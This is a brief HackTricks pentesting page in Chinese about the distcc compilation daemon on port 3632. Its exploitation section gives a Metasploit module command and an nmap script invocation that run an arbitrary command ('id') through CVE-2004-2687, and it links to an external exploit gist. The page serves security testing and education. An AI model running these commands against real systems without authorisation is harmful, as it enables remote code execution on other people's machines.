hacktricks/src/network-services-pentesting/3632-pentesting-distcc.md

31 lines
1.1 KiB
Markdown

{{#include ../banners/hacktricks-training.md}}
# 基本信息
**Distcc** 是一个通过利用网络中其他计算机的 **闲置处理能力** 来增强 **编译过程** 的工具。当 **distcc** 在一台机器上设置时,该机器能够将其 **编译任务** 分配给另一台系统。该接收系统必须运行 **distccd daemon** 并且必须安装有 **兼容的编译器** 来处理发送的代码。
**默认端口:** 3632
```
PORT STATE SERVICE
3632/tcp open distccd
```
# 利用
检查它是否易受 **CVE-2004-2687** 的影响以执行任意代码:
```bash
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
```
# Shodan
_我认为 shodan 无法检测到此服务。_
# Resources
- [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec)
- [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)
Post created by **Álex B (@r1p)**
{{#include ../banners/hacktricks-training.md}}